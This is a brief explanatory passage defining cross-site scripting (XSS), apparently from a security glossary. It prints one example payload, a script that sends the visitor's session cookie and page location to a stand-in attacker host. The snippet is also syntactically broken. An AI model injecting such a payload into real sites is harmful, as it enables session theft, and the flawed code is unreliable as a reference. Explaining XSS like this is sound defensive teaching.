What is cross site scripting (XSS)?
Cross site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. If the app or website lacks proper data sanitization, the malicious link executes the attacker’s chosen code on the user’s system. As a result, the attacker can steal the user’s active session cookie. Here’s an example:
<script> i=new/**/Image();isrc=http://evilwebsite.com/log.php?'+document.cookie+' '+document.location</script>
While the payload is usually JavaScript, XSS can take place using any client-side language.